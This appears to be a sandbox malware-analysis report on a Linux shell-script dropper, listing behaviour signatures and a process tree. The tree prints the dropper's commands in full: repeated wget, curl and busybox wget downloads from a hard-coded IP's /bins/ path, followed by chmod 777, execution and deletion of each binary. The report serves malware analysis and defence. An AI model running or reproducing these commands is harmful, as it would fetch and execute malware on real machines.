158202a011e2f210091d07822732a44a44b49799547ef81a718ea519282c5f5d

Analysis

max time kernel
66s
max time network
71s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
26-11-2024 01:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

17a882d74d8f0403825e466d27c6aa7a2d943753c07b52b4cb5eb38452b9f65a.sh
Size

10KB
MD5

25ac41911960743a3801b24c9889d0c1
SHA1

e6d32d6310d18a8bf4ff2fba8fecffae2e12ba4e
SHA256

17a882d74d8f0403825e466d27c6aa7a2d943753c07b52b4cb5eb38452b9f65a
SHA512

98f07a68c31eb173a2cf2e365d1af84975b7be0e880425c50d390b11ce14d3502be471f7bac02bf2ecf731080a07f1352116ed0ec2b55e2d8b318efa272a2967
SSDEEP

192:Y7m95hRUWj5PiUxYkAOFlNtNTWkAOFlK95hRUWi:Y7m95hWWjsUxRtC95hWWi

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 25 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
862	chmod
868	chmod
874	chmod
907	chmod
920	chmod
771	chmod
810	chmod
848	chmod
887	chmod
895	chmod
720	chmod
842	chmod
854	chmod
788	chmod
824	chmod
830	chmod
881	chmod
913	chmod
684	chmod
694	chmod
738	chmod
901	chmod
702	chmod
757	chmod
836	chmod

Executes dropped EXE 25 IoCs

Processes:

BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YWevByMY4wmzNymjcp2tK0lMRkVdU65J5ieu8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGvK1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteSde1TCtowW4YXLK3aMQCLCu45FaZiSUUewLYPX20iXdE01EubuCO1vKPKpWurO2dtxnfvNFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4qWbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCObm4U9kz9o489NfSCsldH4iikrwNKhC0D83VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3dcWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4qWbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCOK1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteSde1TCtowW4YXLK3aMQCLCu45FaZiSUUewLYPX20iXdE01EubuCO1vKPKpWurO2dtxnfvbm4U9kz9o489NfSCsldH4iikrwNKhC0D83VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3dcWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg7257KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv

Checks CPU configuration 1 TTPs 25 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 50 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 25 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q	curl
File opened for modification	/tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO	curl
File opened for modification	/tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS	curl
File opened for modification	/tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83	curl
File opened for modification	/tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d	curl
File opened for modification	/tmp/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu	curl
File opened for modification	/tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv	curl
File opened for modification	/tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO	curl
File opened for modification	/tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72	curl
File opened for modification	/tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv	curl
File opened for modification	/tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3	curl
File opened for modification	/tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL	curl
File opened for modification	/tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3	curl
File opened for modification	/tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv	curl
File opened for modification	/tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q	curl
File opened for modification	/tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d	curl
File opened for modification	/tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS	curl
File opened for modification	/tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv	curl
File opened for modification	/tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83	curl
File opened for modification	/tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8	curl
File opened for modification	/tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL	curl
File opened for modification	/tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8	curl
File opened for modification	/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW	curl
File opened for modification	/tmp/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju	curl
File opened for modification	/tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72	curl

/tmp/17a882d74d8f0403825e466d27c6aa7a2d943753c07b52b4cb5eb38452b9f65a.sh
/tmp/17a882d74d8f0403825e466d27c6aa7a2d943753c07b52b4cb5eb38452b9f65a.sh
1⤵
PID:655
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:662
- /usr/bin/wget
  wget http://216.126.231.240/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:664
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:673
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:681
- /bin/chmod
  chmod 777 BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - File and Directory Permissions Modification
  PID:684
- /tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  ./BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - Executes dropped EXE
  PID:686
- /bin/rm
  rm BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:688
- /usr/bin/wget
  wget http://216.126.231.240/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  PID:689
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:691
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  PID:693
- /bin/chmod
  chmod 777 evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - File and Directory Permissions Modification
  PID:694
- /tmp/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  ./evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - Executes dropped EXE
  PID:695
- /bin/rm
  rm evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  PID:696
- /usr/bin/wget
  wget http://216.126.231.240/bins/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  PID:697
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:698
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  PID:699
- /bin/chmod
  chmod 777 8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  - File and Directory Permissions Modification
  PID:702
- /tmp/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  ./8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  - Executes dropped EXE
  PID:704
- /bin/rm
  rm 8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  PID:705
- /usr/bin/wget
  wget http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:707
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:710
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:715
- /bin/chmod
  chmod 777 57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - File and Directory Permissions Modification
  PID:720
- /tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  ./57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - Executes dropped EXE
  PID:721
- /bin/rm
  rm 57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:723
- /usr/bin/wget
  wget http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:724
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:730
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:735
- /bin/chmod
  chmod 777 K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - File and Directory Permissions Modification
  PID:738
- /tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  ./K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - Executes dropped EXE
  PID:740
- /bin/rm
  rm K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:741
- /usr/bin/wget
  wget http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:743
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:746
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:752
- /bin/chmod
  chmod 777 n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - File and Directory Permissions Modification
  PID:757
- /tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  ./n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - Executes dropped EXE
  PID:758
- /bin/rm
  rm n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:760
- /usr/bin/wget
  wget http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:761
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:765
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:769
- /bin/chmod
  chmod 777 de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - File and Directory Permissions Modification
  PID:771
- /tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  ./de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - Executes dropped EXE
  PID:772
- /bin/rm
  rm de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:773
- /usr/bin/wget
  wget http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:774
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:775
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:778
- /bin/chmod
  chmod 777 YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - File and Directory Permissions Modification
  PID:788
- /tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  ./YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - Executes dropped EXE
  PID:790
- /bin/rm
  rm YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:791
- /usr/bin/wget
  wget http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:792
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:799
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:806
- /bin/chmod
  chmod 777 NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - File and Directory Permissions Modification
  PID:810
- /tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  ./NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - Executes dropped EXE
  PID:811
- /bin/rm
  rm NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:812
- /usr/bin/wget
  wget http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:813
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:818
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:822
- /bin/chmod
  chmod 777 WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - File and Directory Permissions Modification
  PID:824
- /tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  ./WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - Executes dropped EXE
  PID:825
- /bin/rm
  rm WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:826
- /usr/bin/wget
  wget http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:827
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:828
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:829
- /bin/chmod
  chmod 777 bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - File and Directory Permissions Modification
  PID:830
- /tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  ./bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - Executes dropped EXE
  PID:831
- /bin/rm
  rm bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:832
- /usr/bin/wget
  wget http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:833
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:834
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:835
- /bin/chmod
  chmod 777 VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - File and Directory Permissions Modification
  PID:836
- /tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  ./VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - Executes dropped EXE
  PID:837
- /bin/rm
  rm VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:838
- /usr/bin/wget
  wget http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:839
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:840
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:841
- /bin/chmod
  chmod 777 SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - File and Directory Permissions Modification
  PID:842
- /tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  ./SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - Executes dropped EXE
  PID:843
- /bin/rm
  rm SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:844
- /usr/bin/wget
  wget http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:845
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:846
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:847
- /bin/chmod
  chmod 777 cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - File and Directory Permissions Modification
  PID:848
- /tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  ./cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - Executes dropped EXE
  PID:849
- /bin/rm
  rm cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:850
- /usr/bin/wget
  wget http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:851
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:852
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:853
- /bin/chmod
  chmod 777 NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - File and Directory Permissions Modification
  PID:854
- /tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  ./NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - Executes dropped EXE
  PID:855
- /bin/rm
  rm NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:856
- /usr/bin/wget
  wget http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:859
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:860
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:861
- /bin/chmod
  chmod 777 WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - File and Directory Permissions Modification
  PID:862
- /tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  ./WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - Executes dropped EXE
  PID:863
- /bin/rm
  rm WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:864
- /usr/bin/wget
  wget http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:865
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:866
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:867
- /bin/chmod
  chmod 777 K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - File and Directory Permissions Modification
  PID:868
- /tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  ./K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - Executes dropped EXE
  PID:869
- /bin/rm
  rm K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:870
- /usr/bin/wget
  wget http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:871
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:872
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:873
- /bin/chmod
  chmod 777 n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - File and Directory Permissions Modification
  PID:874
- /tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  ./n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - Executes dropped EXE
  PID:875
- /bin/rm
  rm n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:876
- /usr/bin/wget
  wget http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:877
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:879
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:880
- /bin/chmod
  chmod 777 de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - File and Directory Permissions Modification
  PID:881
- /tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  ./de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - Executes dropped EXE
  PID:882
- /bin/rm
  rm de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:883
- /usr/bin/wget
  wget http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:884
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:885
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:886
- /bin/chmod
  chmod 777 YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - File and Directory Permissions Modification
  PID:887
- /tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  ./YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - Executes dropped EXE
  PID:888
- /bin/rm
  rm YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:889
- /usr/bin/wget
  wget http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:890
- /usr/bin/curl
